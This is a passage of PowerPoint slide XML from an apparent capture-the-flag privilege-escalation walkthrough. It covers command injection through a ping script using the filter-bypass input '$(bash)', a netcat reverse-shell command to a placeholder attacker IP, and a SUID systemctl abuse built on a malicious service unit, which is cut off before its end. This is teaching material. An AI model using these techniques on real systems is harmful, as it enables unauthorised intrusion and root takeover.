                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Will cause alerts in the CSOC.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Can be considered criminal.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18915405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2288931" cy="5646208"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Priv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Esc</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www-data -&gt; Pepper</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>We can run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>simpler.py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> as Pepper. Let’s read through </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>simpler.py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> to see if we can take advantage of this.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="365760" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>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5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32732086-4308-1947-9151-8B423EBD57EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6610350" y="1746250"/>
            <a:ext cx="5092700" cy="1866900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A6EDBB8-1E4D-FA4C-8239-A4FE843CDA14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3515134" y="1746250"/>
            <a:ext cx="2654300" cy="673100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA887250-483A-334E-801F-C7C4D3C055AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3263900" y="2641600"/>
            <a:ext cx="3250534" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Summary: Calling this script with –p will call the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>exec_ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> function. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD312071-BC93-8949-AAA2-85B0F34960AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3286353" y="3703935"/>
            <a:ext cx="8413278" cy="2585323"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It will attempt to filter that input, then run a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>system command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (read: bash) with our user-supplied input placed directly in it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Strategy: Let’s get a malicious command in there, we just need to bypass the filter.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Input: $(bash)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This will launch a shell as pepper and it doesn’t contain any forbidden characters. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38685647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2288931" cy="5646208"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Priv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Esc</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www-data -&gt; Pepper</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="4"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Now we have a blind shell. (Can’t see any results!)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>You can use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tcpdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> and ping to test that we do have command injection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0"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4243128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2288931" cy="5646208"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Priv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Esc</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www-data -&gt; Pepper</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="4"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Now we have a blind shell. (Can’t see any results!)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>You can use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tcpdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> and ping to test that we do have command injection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Let’s establish a better shell:</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Start a new listener at a different port on your machine</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On Target machine run:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="201168" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> YOUR_IP PORT –e /bin/bash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="4"/>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145972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2288931" cy="5646208"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Priv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Esc</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www-data -&gt; Pepper</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="4"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Now we have a blind shell. (Can’t see any results!)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>You can use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tcpdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> and ping to test that we do have command injection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Let’s establish a better shell:</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Start a new listener at a different port on your machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="201168" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>On Target machine run:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="201168" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> YOUR_IP PORT –e /bin/bash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>whoami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> to see that you are now Pepper.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="4"/>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753779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2288931" cy="5646208"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Priv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Esc</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Pepper -&gt; root</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="34290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Looking at the SUID binary </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>systemctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> on GTFO bins:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://gtfobins.github.io/gtfobins/systemctl/#suid</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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Summary:</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We need to create a service as Pepper that is malicious (reverse shell). Link it, and then enable it. </a:t>
            </a:r>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Google “How to make a service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>” </a:t>
            </a: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5713348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2288931" cy="5646208"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Priv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Esc</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Pepper -&gt; root</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="34290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Looking at the SUID binary </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>systemctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> on GTFO bins:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://gtfobins.github.io/gtfobins/systemctl/#suid</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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Summary:</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We need to create a service as Pepper that is malicious (reverse shell). Link it, and then enable it. </a:t>
            </a:r>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Google “How to make a service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>linux</a:t>
            </a:r>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[Unit]</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Description=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Ownage</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[Service]</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
